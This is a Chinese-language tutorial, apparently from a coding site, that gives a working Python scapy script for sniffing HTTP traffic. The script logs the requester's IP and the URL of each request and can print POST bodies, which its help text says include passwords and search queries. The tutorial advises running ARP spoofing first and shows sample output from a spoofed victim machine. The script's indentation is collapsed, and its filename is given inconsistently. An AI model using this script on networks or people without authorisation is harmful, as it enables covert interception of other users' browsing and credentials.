对网络安全工程师来说,监视网络似乎总是一项有用的任务,因为它使他们能够查看网络中正在发生的事情,查看和控制恶意流量等。在本教程中,您将学会如何嗅探HTTP数据包。
我们继续使用scapy来实现嗅探,一旦检测到HTTP请求,我们将提取一些信息并打印出来,很容易吗?让我们开始吧。
在Scapy 2.4.3+中,默认情况下支持HTTP数据包。让我们安装本教程的要求:
pip3 install scapy colorama
我们这里需要colorama只是为了输出http数据包的时候好看一些。from scapy.all import * from scapy.layers.http import HTTPRequest # import HTTP packet from colorama import init, Fore # initialize colorama init() # define colors GREEN = Fore.GREEN RED = Fore.RED RESET = Fore.RESET
def sniff_packets(iface=None): """ Sniff 80 port packets with `iface`, if None (default), then the Scapy's default interface is used """ if iface: # port 80 for http (generally) # `process_packet` is the callback sniff(filter="port 80", prn=process_packet, iface=iface, store=False) else: # sniff with default interface sniff(filter="port 80", prn=process_packet, store=False)
def process_packet(packet): """ This function is executed whenever a packet is sniffed """ if packet.haslayer(HTTPRequest): # if this packet is an HTTP Request # get the requested URL url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode() # get the requester's IP Address ip = packet[IP].src # get the request method method = packet[HTTPRequest].Method.decode() print(f"\n{GREEN}[+] {ip} Requested {url} with {method}{RESET}") if show_raw and packet.haslayer(Raw) and method == "POST": # if show_raw flag is enabled, has raw data, and the requested method is "POST" # then show raw print(f"\n{RED}[*] Some useful Raw data: {packet[Raw].load}{RESET}")
if __name__ == "__main__": import argparse parser = argparse.ArgumentParser(description="HTTP Packet Sniffer, this is useful when you're a man in the middle." \ + "It is suggested that you run arp spoof before you use this script, otherwise it'll sniff your personal packets") parser.add_argument("-i", "--iface", help="Interface to use, default is scapy's default interface") parser.add_argument("--show-raw", dest="show_raw", action="store_true", help="Whether to print POST raw data, such as passwords, search queries, etc.") # parse arguments args = parser.parse_args() iface = args.iface show_raw = args.show_raw sniff_packets(iface)
[+] 192.168.1.105 Requested bfw.wiki/ with GET
[+] 192.168.1.105 Requested www.bfw.wiki/ with GET
这时,我们正在欺骗“ 192.168.1.100”,说我们是路由器,因此,进入或流出目标计算机的任何数据包都会先流向我们,然后流向路由器。
现在,让我们尝试再次运行http_filter.py脚本:
root@bfw:~/pythonscripts# python3 http_sniffer.py -i wlan0 --show-raw
[+] 192.168.1.100 Requested bfw.wiki/ with GET
[+] 192.168.1.100 Requested www.bfw.wiki/ with GET
[+] 192.168.1.100 Requested www.taobao.com/ with GET
[+] 192.168.1.100 Requested www.taobao.com/index/ with GET
网友评论0